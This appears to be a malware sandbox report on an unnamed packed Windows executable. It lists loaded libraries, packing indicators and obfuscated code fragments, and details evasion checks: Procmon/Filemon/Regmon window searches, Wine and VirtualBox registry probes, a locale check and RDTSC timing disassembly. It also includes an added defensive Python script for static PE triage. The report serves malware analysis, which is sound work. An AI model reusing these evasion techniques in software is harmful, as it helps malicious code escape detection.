Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1827840 > 1048576
Source: file.exe | Static PE information: Raw size of dfcaugdi is bigger than: 0x100000 < 0x1a4600

Data Obfuscation

              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.430000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dfcaugdi:EW;yusrdzyr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dfcaugdi:EW;yusrdzyr:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00456390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00456390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c5494 should be: 0x1cd384
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: dfcaugdi
              Source: file.exeStatic PE information: section name: yusrdzyr
              Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E3888 | push 4F275242h; mov dword ptr [esp], ecx | 1_2_008E38B4
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E3888 | push 13B1BDE8h; mov dword ptr [esp], ebx | 1_2_008E38E7
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E3888 | push ebx; mov dword ptr [esp], 5D6800C3h | 1_2_008E390A
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E3888 | push edx; mov dword ptr [esp], esi | 1_2_008E3968
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0089C0A1 | push esi; mov dword ptr [esp], edx | 1_2_0089C384
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008DA0F9 | push ebx; mov dword ptr [esp], 0EF52A74h | 1_2_008DA114
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E281B | push 53BDEB2Eh; mov dword ptr [esp], edx | 1_2_008E2839
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0090880E | push 37530FD9h; mov dword ptr [esp], edx | 1_2_00908845
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0089702E | push edx; mov dword ptr [esp], ebx | 1_2_0089708C
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007600DF | push 15D77B00h; mov dword ptr [esp], ebx | 1_2_00760119
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007600DF | push eax; mov dword ptr [esp], ecx | 1_2_00760128
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007600DF | push 7DB8AC7Eh; mov dword ptr [esp], ebx | 1_2_00760193
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007600DF | push 7B1064C1h; mov dword ptr [esp], edi | 1_2_00760237
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00457895 | push ecx; ret | 1_2_004578A8
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0088A86C | push 41399E9Ch; mov dword ptr [esp], ebp | 1_2_0088A890
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008B886E | push edx; mov dword ptr [esp], eax | 1_2_008B888F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008AC078 | push ebx; mov dword ptr [esp], 1C6B91E6h | 1_2_008AC0E1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008AC078 | push ebx; mov dword ptr [esp], edx | 1_2_008AC108
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push ecx; mov dword ptr [esp], eax | 1_2_007F8179
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push 5BD8E8BDh; mov dword ptr [esp], edx | 1_2_007F81B5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push 54E8EEC5h; mov dword ptr [esp], ebp | 1_2_007F8206
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push edi; mov dword ptr [esp], edx | 1_2_007F827E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push esi; mov dword ptr [esp], 03DBF978h | 1_2_007F82C5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push 6C2C7A43h; mov dword ptr [esp], ecx | 1_2_007F82F1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push ecx; mov dword ptr [esp], edi | 1_2_007F8372
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push edi; mov dword ptr [esp], 10756933h | 1_2_007F841F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push edi; mov dword ptr [esp], eax | 1_2_007F8435
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push 34860913h; mov dword ptr [esp], edx | 1_2_007F845A
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push 578A41E5h; mov dword ptr [esp], ecx | 1_2_007F8469
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push ecx; mov dword ptr [esp], 6021FA52h | 1_2_007F84C0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007F8174 | push 5626A3DBh; mov dword ptr [esp], edx | 1_2_007F85A1
Source: file.exe | Static PE information: section name: dfcaugdi entropy: 7.955038828119067
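The static indicators listed above (entry point inside .taggant rather than a standard code section, a header CheckSum that does not match the file, non-standard section names, a section whose entropy sits at 7.96 of a possible 8.0 bits per byte, and sections that are both executable and writable) can all be reproduced without a sandbox. The following is an added example, not code from the Joe Sandbox report or from the sample: it parses the section table with the standard library only, measures per-section entropy, locates the section holding the entry point and verifies the PE checksum. The PE it analyses by default is constructed for the example (it is not the analysed file); the names dfcaugdi and .taggant are reused only so the output mirrors the report, and the 7.0-bit entropy threshold is a choice made here.

```python
"""Static PE triage with the standard library only: section names and rights,
per-section entropy, the section holding the entry point, and the PE checksum.
Added example: the file it analyses by default is built by build_sample_pe()."""
import hashlib
import math
import struct
import sys

STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls"}
SCN_MEM_EXECUTE, SCN_MEM_WRITE = 0x20000000, 0x80000000

def shannon_entropy(buf: bytes) -> float:
    """0.0 for a constant buffer, approaching 8.0 for uniformly random bytes."""
    n = len(buf)
    probs = [buf.count(b) / n for b in set(buf)]
    return -sum(p * math.log2(p) for p in probs) if n else 0.0

def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """CheckSumMappedFile's algorithm: fold every dword except the CheckSum field
    itself into a 16-bit sum, then add the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(0, len(padded), 4):
        if i == (checksum_offset & ~3):
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def parse_pe(data: bytes):
    """Return (entry_rva, offset_of_checksum_field, stored_checksum, sections)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24          # optional header; CheckSum sits at +64 for PE32 and PE32+
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    stored = struct.unpack_from("<I", data, opt + 64)[0]
    sections = []
    for i in range(nsec):
        hdr = opt + opt_size + 40 * i
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, hdr)
        chars = struct.unpack_from("<I", data, hdr + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "raw": data[rawptr:rawptr + rawsize], "chars": chars})
    return entry, opt + 64, stored, sections

def analyze(data: bytes) -> dict:
    """The static findings the report lists, as one dictionary."""
    entry, cs_off, stored, sections = parse_pe(data)
    holder = next((s for s in sections
                   if s["va"] <= entry < s["va"] + max(s["vsize"], len(s["raw"]))), None)
    return {
        "entry_section": holder["name"] if holder else None,
        "entry_in_standard_section": bool(holder) and holder["name"] in STANDARD_SECTIONS,
        "checksum_ok": stored == pe_checksum(data, cs_off),
        "odd_names": [s["name"] for s in sections if s["name"] not in STANDARD_SECTIONS],
        "high_entropy": [s["name"] for s in sections if shannon_entropy(s["raw"]) > 7.0],
        "writable_code": [s["name"] for s in sections
                          if s["chars"] & SCN_MEM_EXECUTE and s["chars"] & SCN_MEM_WRITE],
    }

def fix_checksum(data: bytes) -> bytes:
    """Write the computed checksum back into the header, the way a linker would."""
    _, cs_off, _, _ = parse_pe(data)
    patched = bytearray(data)
    struct.pack_into("<I", patched, cs_off, pe_checksum(data, cs_off))
    return bytes(patched)

def build_sample_pe() -> bytes:
    """Constructed three-section PE32 (not the report's sample): a normal .text, a
    high-entropy 'dfcaugdi' section, and an execute+write '.taggant' section holding
    the entry point.  CheckSum is left at zero, so it will not verify."""
    text = b"\x55\x8b\xec\x5d\xc3".ljust(0x200, b"\xcc")
    packed = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(16))
    payloads = [(b".text", 0x1000, text, 0x60000020),
                (b"dfcaugdi", 0x2000, packed, 0xE0000040),
                (b".taggant", 0x3000, b"\x90" * 0x200, 0xE0000020)]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)               # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(payloads), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 16, 0x3010)                          # AddressOfEntryPoint, in .taggant
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)       # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x4000, 0x400)                  # SizeOfImage, SizeOfHeaders
    headers, body, raw_ptr = b"", b"", 0x400
    for name, va, raw, chars in payloads:
        headers += struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), raw_ptr, 0, 0, 0, 0, chars)
        body += raw
        raw_ptr += len(raw)
    return (dos + coff + bytes(opt) + headers).ljust(0x400, b"\0") + body

if __name__ == "__main__":
    sample = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in analyze(sample).items():
        print(f"{key}: {value}")
```

Run it with a path to see the same findings for a real file; the checksum mismatch on its own is weak evidence (many legitimate unsigned binaries ship with a zero CheckSum), but a non-standard entry-point section combined with an execute+write section and one near-8.0-entropy section is the shape a packer leaves behind.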

              Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00456390 | GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 1_2_00456390

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (the user locale is queried and the process can exit depending on the answer)
Source: C:\Users\user\Desktop\file.exe | File opened (registry key): HKEY_CURRENT_USER\Software\Wine (exists only under Wine)
Source: C:\Users\user\Desktop\file.exe | File opened (registry key): HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (the DSDT table name VirtualBox exposes to the guest)
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8108F5 second address: 81090D instructions: 0x00000000 rdtsc 0x00000002 js 00007FEF0C74E726h 0x00000008 ja 00007FEF0C74E726h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007FEF0C74E732h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81090D second address: 810913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810913 second address: 810933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 jmp 00007FEF0C74E737h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810933 second address: 81093B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81093B second address: 810952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FEF0C74E732h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810952 second address: 810959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810ACD second address: 810AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E72Fh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8141DE second address: 8141FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7663h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8141FB second address: 814232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E735h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b add edx, 35175414h 0x00000011 push 00000000h 0x00000013 or dword ptr [ebp+122D2951h], edx 0x00000019 call 00007FEF0C74E729h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814232 second address: 814266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7665h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEF0C6C765Bh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FEF0C6C765Ch 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814266 second address: 81429D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d jmp 00007FEF0C74E732h 0x00000012 pop eax 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007FEF0C74E733h 0x0000001d jmp 00007FEF0C74E72Dh 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81436F second address: 814374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814374 second address: 814397 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+122D3906h] 0x0000000f lea ebx, dword ptr [ebp+12468085h] 0x00000015 mov cx, 27C7h 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jnl 00007FEF0C74E726h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81457E second address: 8145A1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEF0C6C7658h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007FEF0C6C765Fh 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8145A1 second address: 814615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FEF0C74E72Bh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007FEF0C74E734h 0x00000016 pop eax 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FEF0C74E728h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 xor edx, 1F45B1FBh 0x00000037 push eax 0x00000038 cmc 0x00000039 pop ecx 0x0000003a lea ebx, dword ptr [ebp+1246808Eh] 0x00000040 mov dword ptr [ebp+122D22C0h], eax 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 push esi 0x0000004a jmp 00007FEF0C74E730h 0x0000004f pop esi 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814615 second address: 814628 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FEF0C6C7658h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81466F second address: 8146BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEF0C74E733h 0x00000008 jnp 00007FEF0C74E726h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 mov dword ptr [ebp+122D3539h], ebx 0x0000001a push 00000000h 0x0000001c xor dword ptr [ebp+122D2268h], ebx 0x00000022 push 4EB9AA3Ch 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FEF0C74E736h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8146BC second address: 814742 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEF0C6C7658h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 4EB9AABCh 0x00000013 mov dword ptr [ebp+122D1F47h], ecx 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FEF0C6C7658h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 push 00000003h 0x00000039 add dword ptr [ebp+122D2971h], eax 0x0000003f push 604B72A3h 0x00000044 push eax 0x00000045 jmp 00007FEF0C6C7668h 0x0000004a pop eax 0x0000004b add dword ptr [esp], 5FB48D5Dh 0x00000052 mov ecx, dword ptr [ebp+122D3872h] 0x00000058 lea ebx, dword ptr [ebp+12468099h] 0x0000005e sbb cx, 067Ah 0x00000063 movzx edi, ax 0x00000066 xchg eax, ebx 0x00000067 jp 00007FEF0C6C7664h 0x0000006d push eax 0x0000006e push edx 0x0000006f push esi 0x00000070 pop esi 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835BF5 second address: 835BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BD21 second address: 80BD2D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEF0C6C7656h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BD2D second address: 80BD53 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEF0C74E738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FEF0C74E72Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BD53 second address: 80BD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jns 00007FEF0C6C7656h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BD63 second address: 80BD69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BD69 second address: 80BD6F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833A5D second address: 833A88 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEF0C74E726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jp 00007FEF0C74E726h 0x00000013 popad 0x00000014 push ebx 0x00000015 jmp 00007FEF0C74E734h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833A88 second address: 833A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833A92 second address: 833AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jo 00007FEF0C74E726h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833D6A second address: 833D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FEF0C6C765Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833D7D second address: 833D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833EBA second address: 833ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FEF0C6C765Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833ECD second address: 833EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEF0C74E726h 0x0000000a popad 0x0000000b pushad 0x0000000c jns 00007FEF0C74E726h 0x00000012 jnl 00007FEF0C74E726h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push ecx 0x0000001e jmp 00007FEF0C74E731h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834211 second address: 834235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FEF0C6C7656h 0x0000000a jmp 00007FEF0C6C7669h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8348F1 second address: 8348FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop esi 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8348FA second address: 83491A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7666h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FEF0C6C7656h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83491A second address: 83491E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834A6F second address: 834A8A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEF0C6C7658h 0x00000008 js 00007FEF0C6C765Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834A8A second address: 834A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8283AC second address: 8283B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8283B0 second address: 8283BC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEF0C74E72Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
